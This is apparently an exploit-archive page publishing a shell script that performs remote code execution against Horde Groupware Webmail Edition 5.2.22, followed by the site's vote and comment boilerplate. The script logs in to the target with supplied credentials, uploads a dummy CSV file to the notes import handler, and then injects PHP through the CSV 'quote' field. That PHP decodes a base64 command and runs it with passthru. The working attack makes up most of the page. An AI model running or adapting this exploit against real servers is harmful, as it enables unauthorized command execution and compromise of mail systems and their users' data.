Horde Groupware Webmail Edition 5.2.22 Remote Code Execution

2020.04.03

Credit: Anonymouse

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#!/bin/sh
if [ "$#" -ne 4 ]; then
echo '[!] Usage: <url> <username> <password> <command>' 1>&2
exit 1
fi
BASE="$1"
USERNAME="$2"
PASSWORD="$3"
COMMAND="$4"
JAR="$(mktemp)"
trap 'rm -f "$JAR"' EXIT
echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
curl -si -c "$JAR" "$BASE/login.php" \
-d 'login_post=1' \
-d "horde_user=$USERNAME" \
-d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
echo '[!] Cannot log in' 1>&2
echo "[+] Uploading dummy file" 1>&2
echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
-F 'actionID=11' \
-F 'import_step=1' \
-F 'import_format=csv' \
-F 'notepad_target=x' \
-F 'import_file=@-;filename=x' \
-so /dev/null
echo "[+] Running command" 1>&2
BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
curl -b "$JAR" "$BASE/mnemo/data.php" \
-d 'actionID=3' \
-d 'import_step=2' \
-d 'import_format=csv' \
-d 'header=1' \
-d 'fields=1' \
-d 'sep=x' \
--data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Horde Groupware Webmail Edition 5.2.22 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.